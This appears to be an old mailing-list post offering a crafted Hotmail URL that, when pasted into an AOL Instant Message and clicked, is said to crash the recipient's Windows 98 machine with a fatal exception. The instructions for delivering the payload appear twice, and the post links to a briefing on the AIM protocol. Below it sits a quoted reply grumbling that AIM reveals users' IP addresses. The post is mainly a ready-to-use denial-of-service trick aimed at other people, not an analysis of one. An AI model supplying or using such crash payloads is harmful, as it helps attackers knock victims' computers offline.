http://lw3fd.law3.hotmail.msn.com/cgi-bin/start?pp=yes&disk=209.185.240.66_d231&login=bugtest&f=1024&curmbox=ACTIVE&_lang=DE&beta=&js=no&sec=no&_lang=DE&set_cookie=75DF00DE1686BB793B94FA62EF4A322ED54724A1F96F4F10&t=2AAAAAAAADoq8Qr8K6i2rTqEshdQKJ6VJEJaZz1cNlGmfu9ewsRiYwFA$$&p=2AAAAAAAAG1xP42FPL1sQuJ!UKJ6!aNNQZQrsSow*RBugLeliUoBYwyBTojdQaZzMCu6IAnus!N9AjKVZeGNTE*g3gntCuDLLRjAOOPydZs*PhZn*0h!8ZQZM1tZepArHyJHzgZkRuDGqh66fL23gTkE8yxGGvd1pj

Use: Copy & paste the string into an AOL Instant Message.  Press Enter to 
submit the line.
Then click the string, and your windows 98 (SE) should say goodbye within 2 
seconds.

Which would result in:

"A Fatal Exception 0E has occured at 0028:C00140DB in VxD VMM(01) + 000130DB"

Not that anyone us would try this of course.. :)


Refer to Rootshell for an good briefing on the AIM Protocol.. :)
http://rootshell.com/archive-j457nxiqi3gq59dv/199807/aimprotocol.txt.html




Use: Copy & paste the string into an AOL Instant Message.  Press Enter to 
submit the line.
Then click the string, and your windows 98 (SE) should say goodbye within 2 
seconds.

At 09:35 PM 12/5/00 -0500, [EMAIL PROTECTED] wrote:
>Just a weird comment,but on AOL's instant messager,it allows you to list your
>IP adress.Isn't that wonderful?::Sarcasm::Now people can stay on all day and
>be hacked because they just wanted to see what that number was.Theory
>here....Why the heck does AOL think people want to give their IP out
>anyways?I think mabye they are trying to get everybody to be hacked,and have
>lots of viri,so they can recommend Norton,and Norton's(or McAfee,seen
>both.How wonderful) firewall.Ah.Just thinking......
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